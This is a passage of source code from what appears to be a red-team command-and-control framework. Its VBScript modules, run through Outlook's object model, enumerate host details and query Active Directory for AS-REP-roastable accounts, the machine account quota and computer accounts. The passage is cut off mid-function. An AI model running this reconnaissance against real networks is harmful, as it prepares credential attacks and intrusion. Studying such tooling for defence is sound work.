    Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
    Set col = objWMIService.ExecQuery ("Select * from Win32_Service")
    For Each objService in col
        ' The "Name:" line carries StartName, i.e. the account the service runs as.
        services = services & vbCrLf & objService.Name & vbCrLf & " State:" & objService.State & vbCrLf & " Name: " & objService.StartName & vbCrLf & " BinPath:" & objService.PathName
    Next
    list_services = services
End Function
================================================
FILE: functions/enumerate/host/list_startmenu.py
================================================
from lib.core.specmodule import SpecModule
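class Spec(SpecModule):
    """Module descriptor paired with the ``list_startmenu`` template."""

    def __init__(self, templatepath, helpers):
        """Populate the module metadata, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The backslash is written as "\\" so the text holds no invalid escape
        # sequence (a SyntaxWarning on current Python); the resulting string is
        # the same as before.
        self.help = """
Lists the structure and items in the start menu.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: Select Name from Win32_LogicalProgramGroupItem
"""
        # Same name as the Function defined in list_startmenu.txt.
        self.entry = 'list_startmenu'
        self.depends = []
        super().__init__(templatepath)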
================================================
FILE: functions/enumerate/host/list_startmenu.txt
================================================
' Lists the Name of every Win32_LogicalProgramGroupItem, one per line.
Function list_startmenu()
    ' Errors are suppressed; a failing statement is skipped and execution continues.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    ' Local machine (".") and the root\cimv2 namespace.
    Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select Name from Win32_LogicalProgramGroupItem")
    For Each objItem in colItems
        ' The result is accumulated directly in the function's return value.
        list_startmenu = list_startmenu & objItem.Name & vbCrLF
    Next
End Function
================================================
FILE: functions/enumerate/host/list_timezone.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
from lib.core.specmodule import SpecModule
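class Spec(SpecModule):
    """Module descriptor paired with the ``list_timezone`` template."""

    def __init__(self, templatepath, helpers):
        """Populate the module metadata, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Backslashes are written as "\\" so the text holds no invalid escape
        # sequences (a SyntaxWarning on current Python); the resulting string
        # is the same as before.
        self.help = """
Finds the name of the current timezone for the agent
It uses WbemScripting.SWbemNamedValueSet
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).GetStringValue
"""
        # Same name as the Function defined in list_timezone.txt.
        self.entry = 'list_timezone'
        self.depends = []
        super().__init__(templatepath)

    def rethandler(self, agent, options, data):
        """Store the returned timezone name on the agent record.

        Args:
            agent: Object whose ``timezone`` attribute is set.
            options: Not used by this handler.
            data: Value returned by the agent; stored as received, with no
                validation, so consumers should treat it as untrusted text.
        """
        agent.timezone = data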
================================================
FILE: functions/enumerate/host/list_timezone.txt
================================================
' Returns the TimeZoneKeyName registry value, read through the WMI StdRegProv
' provider.
Function list_timezone()
    ' Errors are suppressed; if the read fails the function returns an empty value.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    ' Registry access goes through WMI (StdRegProv in root\cimv2).
    Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
    ' 2147483650 is &H80000002, HKEY_LOCAL_MACHINE; strtimezone is the out parameter.
    objreg.GetStringValue 2147483650, "SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "TimeZoneKeyName", strtimezone
    list_timezone = strtimezone
End Function
================================================
FILE: functions/enumerate/host/list_whoami.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
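class Spec(SpecModule):
    """Module descriptor paired with the ``list_whoami`` template."""

    def __init__(self, templatepath, helpers):
        """Populate the module metadata, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Backslashes are written as "\\" so the text holds no invalid escape
        # sequences (a SyntaxWarning on current Python); the resulting string
        # is the same as before.
        self.help = """
Whoami with limited information. Missing privileges since there is no way to get
that without API access or running external binaries
It uses CreateObject("Wscript.Shell")
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\directory\\LDAP)
- Query: "SELECT DS_memberOf FROM ds_user Where DS_sAMAccountName = '" & strUsername & "'"
- ConnectServer(root\\cimv2)
- Query: "SELECT * FROM Win32_UserProfile Where SID='" & strSID & "'"
"""
        # Same name as the Function defined in list_whoami.txt.
        self.entry = 'list_whoami'
        self.depends = []
        super().__init__(templatepath)

    def rethandler(self, agent, options, data):
        """Record the SID reported in the module output on the agent.

        The output is text produced on the remote host, so it is parsed
        defensively: a "SID:" line without a value is ignored instead of
        raising ``IndexError``, and nothing is read from an unset variable
        when no "SID:" line is present.

        Args:
            agent: Object whose ``sid`` attribute is set when a SID is found.
            options: Not used by this handler.
            data: Module output as a string.
        """
        for line in data.split("\n"):
            if not line.startswith("SID:"):
                continue
            # split() also drops the trailing "\r" left over from vbCrLf.
            fields = line.split()
            if len(fields) > 1 and fields[1]:
                agent.sid = fields[1]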
================================================
FILE: functions/enumerate/host/list_whoami.txt
================================================
' Builds a whoami-style report for the current user: user name, domain and SID,
' then the DS_memberOf values from the LDAP WMI provider, then a few
' Win32_UserProfile fields. Returns the report text.
Function list_whoami()
    ' Errors are suppressed; a failing statement is skipped and execution continues.
    on error resume next
    Set objShell = window.external.OutlookApplication.CreateObject("WScript.Shell")
    output = "USER INFORMATION" & vbCrLF
    output = output & "----------------" & vbCrLF
    ' Identity values are taken from the per-session "Volatile Environment" key
    ' of the current user.
    strUsername = objShell.RegRead("HKEY_CURRENT_USER\Volatile Environment\username")
    strUserDNSDomain = objShell.RegRead("HKEY_CURRENT_USER\Volatile Environment\userdnsdomain")
    strUserDomain = objShell.RegRead("HKEY_CURRENT_USER\Volatile Environment\userdomain")
    if strUserDNSDomain = "" then
        ' NOTE(review): there is no "=" here, so this is not an assignment; the
        ' statement presumably fails and is skipped, and the WORKGROUP fallback
        ' never takes effect.
        strUserDNSDomain "WORKGROUP"
    end if
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
    ' 2147483651 is &H80000003, HKEY_USERS: enumerate the loaded user hives.
    objreg.EnumKey 2147483651, "", arrSubKeys
    ' The SID is found by matching each hive's Volatile Environment\USERNAME
    ' against the current user name (case-insensitive); first match wins.
    For Each strSubKey In arrSubKeys
        If Left(strSubKey, 6) = "S-1-5-" Then
            strVolatileEnvKeyPath = strSubKey & "\Volatile Environment"
            strVolatileEnvValueName = "USERNAME"
            objreg.GetStringValue 2147483651, strVolatileEnvKeyPath, strVolatileEnvValueName, strUserValue
            If StrComp(strUserValue, strUsername, vbTextCompare) = 0 Then
                strSID = strSubKey
                Exit For
            End If
        End If
    Next
    output = output & "Username: " & strUsername & vbCrLF
    output = output & "DNS Domain: " & strUserDNSDomain & vbCrLF
    output = output & "Domain: " & strUserDomain & vbCrLF
    ' The server-side rethandler for this module parses this "SID:" line.
    output = output & "SID: " & strSID & vbCrLF
    output = output & vbCrLF
    output = output & "GROUP INFORMATION" & vbCrLF
    output = output & "----------------" & vbCrLF
    Set objLDAP = objLocator.ConnectServer(".", "\root\directory\LDAP")
    ' The user name is concatenated into the WQL text without escaping.
    Set colItems = objLDAP.ExecQuery("SELECT DS_memberOf FROM ds_user Where DS_sAMAccountName = '" & strUsername & "'")
    For Each PATH in colItems
        For Each pathAttribute in PATH.Properties_
            ' Properties are printed according to the VBScript type of their
            ' value; embedded objects are skipped.
            Select Case TypeName(pathAttribute.value)
                case "String"
                    Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
                case "Long"
                    Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
                case "Boolean"
                    Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
                case "SWbemObjectEx"
                    'Cannot get this work...
                    'Returndata = Returndata & pathAttribute.name & vbCrLf
                case "Variant()"
                    ' Array values are joined with commas.
                    Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
            End Select
        Next
    Next
    output = output & Returndata & vbCrLF
    output = output & "OTHER INFORMATION" & vbCrLF
    output = output & "----------------------" & vbCrLF
    Set objwmi = objLocator.ConnectServer(".", "root\cimv2")
    ' If no SID was matched above, strSID is empty and this query matches no profile.
    Set userStateInfo = objwmi.ExecQuery("SELECT * FROM Win32_UserProfile Where SID='" & strSID & "'")
    For Each userInfo in userStateInfo
        output = output & "RoamingConfigured: " & userInfo.RoamingConfigured & vbCrLF
        output = output & "RoamingPath: " & userInfo.RoamingPath & vbCrLF
        output = output & "LocalPath: " & userInfo.LocalPath & vbCrLF
    Next
    list_whoami = output
End Function
================================================
FILE: functions/enumerate/host/list_windowsarch.py
================================================
from lib.core.specmodule import SpecModule
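class Spec(SpecModule):
    """Module descriptor paired with the ``list_windowsarch`` template."""

    def __init__(self, templatepath, helpers):
        """Populate the module metadata, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Backslashes are written as "\\" so the text holds no invalid escape
        # sequences (a SyntaxWarning on current Python); the resulting string
        # is the same as before.
        self.help = """
Enumerates the Windows Architecture on the host.
This module writes the result to agent in the database.
Arch value is found under:
HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment - PROCESSOR_ARCHITECTURE.
It uses WbemScripting.SWbemLocator
- ConnectServer
- ConnectServer(root\\cimv2).GetStringValue
"""
        # Same name as the Function defined in list_windowsarch.txt.
        self.entry = 'list_windowsarch'
        self.depends = []
        super().__init__(templatepath)

    def rethandler(self, agent, options, data):
        """Store the returned architecture string on the agent record.

        Args:
            agent: Object whose ``windowsarch`` attribute is set.
            options: Not used by this handler.
            data: Value returned by the agent; stored as received, with no
                validation, so consumers should treat it as untrusted text.
        """
        agent.windowsarch = data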
================================================
FILE: functions/enumerate/host/list_windowsarch.txt
================================================
' Returns the PROCESSOR_ARCHITECTURE registry value, read through the WMI
' StdRegProv provider; "AMD64" is reported as "x64", any other value as read.
Function list_windowsarch()
    ' Errors are suppressed; if the read fails the function returns an empty value.
    On Error Resume Next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
    ' 2147483650 is &H80000002, HKEY_LOCAL_MACHINE; strArch is the out parameter.
    objreg.GetStringValue 2147483650, "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "PROCESSOR_ARCHITECTURE", strArch
    if strArch = "AMD64" Then
        list_windowsarch = "x64"
    else
        list_windowsarch = strArch
    end if
End Function
================================================
FILE: functions/enumerate/host/list_windowsversion.py
================================================
from lib.core.specmodule import SpecModule
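class Spec(SpecModule):
    """Module descriptor paired with the ``list_windowsversion`` template."""

    def __init__(self, templatepath, helpers):
        """Populate the module metadata, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The registry path was already escaped; the namespace on the last line
        # now is too, so the text holds no invalid escape sequence (a
        # SyntaxWarning on current Python). The resulting string is unchanged.
        self.help = """
Enumerates the Current Windows version on the host.
It retrieves data from HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion and lists out:
- ProductName
- ReleaseId
It uses WbemScripting.SWbemLocator
- ConnectServer
- ConnectServer(root\\cimv2).GetStringValue
"""
        # Same name as the Function defined in list_windowsversion.txt.
        self.entry = 'list_windowsversion'
        self.depends = []
        super().__init__(templatepath)

    def rethandler(self, agent, options, data):
        """Store the returned version string on the agent record.

        Args:
            agent: Object whose ``windowsversion`` attribute is set.
            options: Not used by this handler.
            data: Value returned by the agent; stored as received, with no
                validation, so consumers should treat it as untrusted text.
        """
        agent.windowsversion = data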
================================================
FILE: functions/enumerate/host/list_windowsversion.txt
================================================
' Returns "<ProductName> - <ReleaseId>" from the Windows NT\CurrentVersion
' registry key, read through the WMI StdRegProv provider.
Function list_windowsversion()
    ' Errors are suppressed; a value that cannot be read is left empty.
    On Error Resume Next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
    ' 2147483650 is &H80000002, HKEY_LOCAL_MACHINE; the last argument of each
    ' call is the out parameter.
    objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "ProductName", strProdName
    objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "ReleaseId", strRelId
    list_windowsversion = strProdName & " - " & strRelId
End Function
================================================
FILE: functions/enumerate/ldap/ldap_query.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring,escapequotes
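class Spec(SpecModule):
    """Module descriptor paired with the ``ldap_query`` template.

    The WQL text sent to the template is assembled in ``preprocess`` from the
    SELECT / FROM / WHERE_* options and stored in the ``query`` option.
    """

    def __init__(self, templatepath, helpers):
        """Populate the module metadata and options, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The namespace in the first line is now written with "\\" like the
        # rest of the text, so it holds no invalid escape sequence (a
        # SyntaxWarning on current Python). The resulting string is unchanged.
        self.help = """
A module to query LDAP with. To find a list of attributes/values to query use WMI Explorer and look under ROOT\\directory\\LDAP.
Some classes: ds_domain, ds_computer , ds_container , ds_group , ds_top , ds_user
Currently not getting all attributes. Struggling with SWbemObjectEx sub objects.
The WHERE_* is only used if they are specified.
A query without WHERE_* specified looks like this:
SELECT <SELECT OPTION> FROM <FROM OPTION>
A query with WHERE_* specified looks like this:
SELECT <SELECT OPTION> FROM <FROM OPTION> WHERE <WHERE_Attribute> = '<WHERE_Value>'
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT <SELECT OPTION> FROM <FROM OPTION> WHERE <WHERE_Attribute> = '<WHERE_Value>'
"""
        # Same name as the Function defined in ldap_query.txt.
        self.entry = 'ldap_query'
        self.depends = []
        self.options['SELECT'] = {
            "value": "*",
            "required": True,
            "description": "Attribute to get - Ex: DS_givenName or DS_samaccountname or * for everything"
        }
        self.options['FROM'] = {
            "value": "ds_user",
            "required": True,
            "description": "What Class to get the attributes from - Ex: ds_user or ds_computer or ds_domain"
        }
        self.options['WHERE_Attribute'] = {
            "value": None,
            "required": False,
            "description": "Specify attribute Search critera. Only used if specified. Ex: ds_samaccountname"
        }
        self.options['WHERE_Value'] = {
            "value": None,
            "required": False,
            "description": "Specify what to search for. Ex: user1"
        }
        # Filled in by preprocess(); this is the only option the template
        # references.
        self.options['query'] = {
            "value": "Will_Be_generated_from_other_options",
            "required": True,
            "description": "Query that is issued, You do not need to set this option since it is generated based on the other options, only reason this is shown is so you can see it in qlist",
            "handler": quotedstring
        }
        super().__init__(templatepath)

    def preprocess(self, agent):
        """Compose the WQL query from the options and store it in ``query``.

        Args:
            agent: Not used by this method.

        Raises:
            RuntimeError: If only one of WHERE_Attribute / WHERE_Value is set
                while the other is still ``None``.
        """
        select = self.options['SELECT']['value']
        source = self.options['FROM']['value']
        where_attr = self.options['WHERE_Attribute']['value']
        where_value = self.options['WHERE_Value']['value']

        if where_attr and where_value is None:
            raise RuntimeError("Need to specify WHERE_Value when you are specifying WHERE_Attribute")
        if where_value and where_attr is None:
            raise RuntimeError("Need to specify WHERE_Attribute when you are specifying WHERE_Value")

        # NOTE(review): the option values are concatenated into the WQL text
        # as-is; a value containing a single quote produces a malformed query.
        composed_query = "SELECT " + select + " FROM " + source
        if where_attr and where_value:
            composed_query += " Where " + where_attr + " = '" + where_value + "'"
        self.options['query']['value'] = composed_query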
================================================
FILE: functions/enumerate/ldap/ldap_query.txt
================================================
' Runs the WQL query supplied through the {{query}} template placeholder against
' the root\directory\LDAP WMI namespace and returns the properties of every
' result as "name:value" lines.
' {{query}} is replaced before this text becomes a script; the Python side
' registers the quotedstring handler for it, so it is presumably rendered as a
' quoted string literal - confirm against that handler.
Function ldap_query()
    ' Errors are suppressed; a failing statement is skipped and execution continues.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
    ' The query text is echoed at the top of the output.
    Returndata = Returndata & "Running query: " & {{query}} & vbCrLf
    Set colItems = objWMIService.ExecQuery({{query}})
    For Each PATH in colItems
        For Each pathAttribute in PATH.Properties_
            ' Properties are printed according to the VBScript type of their
            ' value; embedded objects are skipped.
            Select Case TypeName(pathAttribute.value)
                case "String"
                    Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
                case "Long"
                    Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
                case "Boolean"
                    Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
                case "SWbemObjectEx"
                    'Cannot get this work...
                    'Returndata = Returndata & pathAttribute.name & vbCrLf
                case "Variant()"
                    ' Array values are joined with commas.
                    Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
            End Select
        Next
        ' Blank line between result objects.
        Returndata = Returndata & vbCrLf
    Next
    ldap_query = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_addcomputertodomain.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Module descriptor paired with the ``list_addcomputertodomain`` template."""

    def __init__(self, templatepath, helpers):
        """Populate the module metadata, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        # No operator-settable options and no dependencies for this module.
        self.options, self.depends = {}, []
        self.helpers = helpers
        # Same name as the Function defined in list_addcomputertodomain.txt.
        self.entry = 'list_addcomputertodomain'
        # Operator-facing help; it names the LDAP attribute and the policy file
        # the template reads.
        self.help = """
Enumerates ms-DS-MachineAccountQuota from LDAP and finds the SeMachineAccountPrivilege in the default domain controller policy
under the static path (GUID is always static for the default domain controller policy):
\\\\domain.com\\Sysvol\\domain.com\\Policies\\{6AC1786C-016F-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_ms_DS_MachineAccountQuota FROM ds_domaindns
It uses Wscript.Shell
- ExpandEnvironmentStrings
It uses Scripting.FileSystemObject
- OpenTextFile
- OpenTextFile().readline
- FileExists
"""
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_addcomputertodomain.txt
================================================
' Reports two settings that govern who may join computers to the domain: the
' ms-DS-MachineAccountQuota value read from the LDAP WMI provider, and any
' SeMachineAccountPrivilege line in the GptTmpl.inf of the policy with the fixed
' GUID used below, read from SYSVOL. Returns the accumulated text.
Function list_addcomputertodomain()
    ' Errors are suppressed; a failing statement is skipped and execution continues.
    On error resume next
    Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject")
    Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell")
    ' DNS domain of the current user, used to build the SYSVOL path below.
    dom = sh.ExpandEnvironmentStrings("%USERDNSDOMAIN%")
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
    Returndata = Returndata & "Running query: SELECT DS_ms_DS_MachineAccountQuota FROM ds_domaindns" & vbCrLf
    Set colItems = objWMIService.ExecQuery("SELECT DS_ms_DS_MachineAccountQuota FROM ds_domaindns")
    For Each PATH in colItems
        For Each pathAttribute in PATH.Properties_
            ' Properties are printed according to the VBScript type of their
            ' value; embedded objects are skipped.
            Select Case TypeName(pathAttribute.value)
                case "String"
                    Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
                case "Long"
                    Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
                case "Boolean"
                    Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
                case "SWbemObjectEx"
                    'Cannot get this work...
                    'Returndata = Returndata & pathAttribute.name & vbCrLf
                case "Variant()"
                    Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
            End Select
        Next
        Returndata = Returndata & vbCrLf
    Next
    ' UNC path of the policy template on the domain's SYSVOL share.
    polpath = "\\" & dom & "\Sysvol\" & dom & "\Policies\{6AC1786C-016F-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
    ' Arguments: 1 = open for reading, False = do not create, True = format flag
    ' (presumably selects Unicode - confirm).
    ' NOTE(review): the file is opened before FileExists is checked; if it is
    ' missing, the open fails silently and f stays unset.
    Set f = fs.OpenTextFile(polpath, 1, False, True)
    If fs.FileExists( polpath ) Then
        ' Report every line that mentions the privilege.
        Do While f.AtEndOfStream = False
            strLine = f.readline
            if InStr(strLine, "SeMachineAccountPrivilege") > 0 Then
                Returndata = Returndata & "Found SeMachineAccountPrivilege entry in default domain controller policy at path" & vbCrLf
                Returndata = Returndata & polpath & vbCrLf
                Returndata = Returndata & "Entry: "
                Returndata = Returndata & strLine & vbCrLf
            end if
        loop
        f.close
    else
        Returndata = Returndata & "Could not find default domain controller policy at path" & vbCrLf
        Returndata = Returndata & polpath & vbCrLf
    end if
    list_addcomputertodomain = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_asreproast.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Module descriptor paired with the ``list_asreproast`` template."""

    def __init__(self, templatepath, helpers):
        """Populate the module metadata, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        # No operator-settable options and no dependencies for this module.
        self.options, self.depends = {}, []
        self.helpers = helpers
        # Same name as the Function defined in list_asreproast.txt.
        self.entry = 'list_asreproast'
        # Operator-facing help; it names the account flag the template looks for
        # and the query it issues.
        self.help = """
Enumerates all users from Active Directory that has the --Do Not Require Kerberos Pre-authentication-- set.
It returns the sAMAccountName, ADSIPath and the useraccountcontrol value
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304
"""
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_asreproast.txt
================================================
' Lists the user accounts whose userAccountControl has the
' DONT_REQUIRE_PREAUTH bit set, with ADSI path, sAMAccountName and the raw
' userAccountControl value. Returns the accumulated text.
Function list_asreproast()
    ' Errors are suppressed; a failing statement is skipped and execution continues.
    On error resume next
    ' userAccountControl bit tested below (4194304 = &H400000).
    Const DONT_REQUIRE_PREAUTH = 4194304
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
    Returndata = Returndata & "Running query: " & "SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304" & vbCrLf
    ' The ">=" comparison is only a coarse pre-filter; the bit itself is tested
    ' in the loop.
    Set colItems = objWMIService.ExecQuery("SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304")
    For Each PATH in colItems
        For Each pathAttribute in PATH.Properties_
            Select Case TypeName(pathAttribute.value)
                case "Long"
                    ' Bitwise And: non-zero when the bit is set.
                    ' NOTE(review): the test runs for every Long-typed property
                    ' of the object, not only DS_userAccountControl, so an
                    ' account could be reported more than once - confirm.
                    if DONT_REQUIRE_PREAUTH and pathAttribute.value Then
                        Returndata = Returndata & PATH.ADSIPath & vbCrLf
                        Returndata = Returndata & "Samaccountname: " & PATH.DS_samaccountname & vbCrLf
                        Returndata = Returndata & "DONT_REQUIRE_PREAUTH enabled" & vbCrLf
                        Returndata = Returndata & "UserAccountControl set to: " & PATH.DS_userAccountControl & vbCrLf
                        Returndata = Returndata & vbCrLf
                    end if
            End Select
        Next
    Next
    list_asreproast = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_computer.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Module descriptor paired with the ``list_computer`` template."""

    def __init__(self, templatepath, helpers):
        """Populate the module metadata and options, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Same name as the Function defined in list_computer.txt.
        self.entry = 'list_computer'
        self.depends = []
        # Single required option; the template references it as
        # {{samaccountname}} and the quotedstring handler is applied to it.
        self.options = {
            'samaccountname': {
                "value": None,
                "required": True,
                "description": "samaccountname to retreive information for",
                "handler": quotedstring
            }
        }
        # Operator-facing help; it names the query the template issues.
        self.help = """
Enumerates the computer specified in the samaccountName option.
If computer account is found it also enumerates the properties of the account.
If account not found it will say so in the returned data.
Remember to specify with $ in the end.
Like: set samaccountname dc1$
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT * FROM ds_computer Where DS_sAMAccountName = VARIABLE
"""
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_computer.txt
================================================
Function list_computer()
' Looks up one computer account by sAMAccountName in the local WMI namespace
' \root\directory\LDAP and returns its properties as text, or a "not found" line.
' {{samaccountname}} is a template placeholder filled in before the script runs.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On error resume next
' Created through Outlook's object model, so the WMI client is presumably the
' hosting Outlook process - NOTE(review): confirm when attributing activity.
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
' The rendered value is concatenated into the WQL text between single quotes
' without any escaping in this function; a value containing a single quote
' would change the query - NOTE(review): check what the option handler emits.
Returndata = Returndata & "Running query: " & "SELECT * FROM ds_computer Where DS_sAMAccountName = '" & {{samaccountname}} & "'" & vbCrLf
Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_computer Where DS_sAMAccountName = '" & {{samaccountname}} & "'")
' Comparison binds tighter than Not, so this reads Not (count <= 0).
' NOTE(review): with errors suppressed, a failure while evaluating this
' condition is not handled explicitly; verify the output when the query fails.
if Not colItems.count <= 0 then
Returndata = Returndata & "samaccountname lookup successful:" & vbCrLf
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
' Output depends on the VBScript type of each value: String, Long and Boolean
' are printed as name:value, arrays are joined with commas, everything else
' produces no output.
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Embedded object values are skipped; the author could not get them to work.
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Next
else
Returndata = Returndata & {{samaccountname}} & " not found" & vbCrLf
end if
list_computer = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_computers.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
    """Descriptor for the ``list_computers`` module: list every computer account name."""

    def __init__(self, templatepath, helpers):
        """Register help text and entry point, then initialise the base class.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.helpers = helpers
        # Presumably the name of the VBScript function in the paired .txt template.
        self.entry = 'list_computers'
        self.depends = []
        # This module takes no operator-supplied options.
        self.options = {}
        self.help = """
Enumerates all computers from Active Directory.
It returns the sAMAccountName
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT DS_sAMAccountName FROM ds_computer
"""
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/ldap/list_computers.txt
================================================
Function list_computers()
' Lists the sAMAccountName of every ds_computer object returned by the local
' WMI namespace \root\directory\LDAP and returns the result as one string.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On error resume next
' Created through Outlook's object model, so the WMI client is presumably the
' hosting Outlook process - NOTE(review): confirm when attributing activity.
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & "SELECT DS_sAMAccountName FROM ds_computer" & vbCrLf
' Unfiltered query: the result size grows with the number of computer objects.
Set colItems = objWMIService.ExecQuery("SELECT DS_sAMAccountName FROM ds_computer")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
' Output depends on the VBScript type of each value: String, Long and Boolean
' are printed as name:value, arrays are joined with commas, everything else
' produces no output.
Select Case TypeName(pathAttribute.value)
case "String"
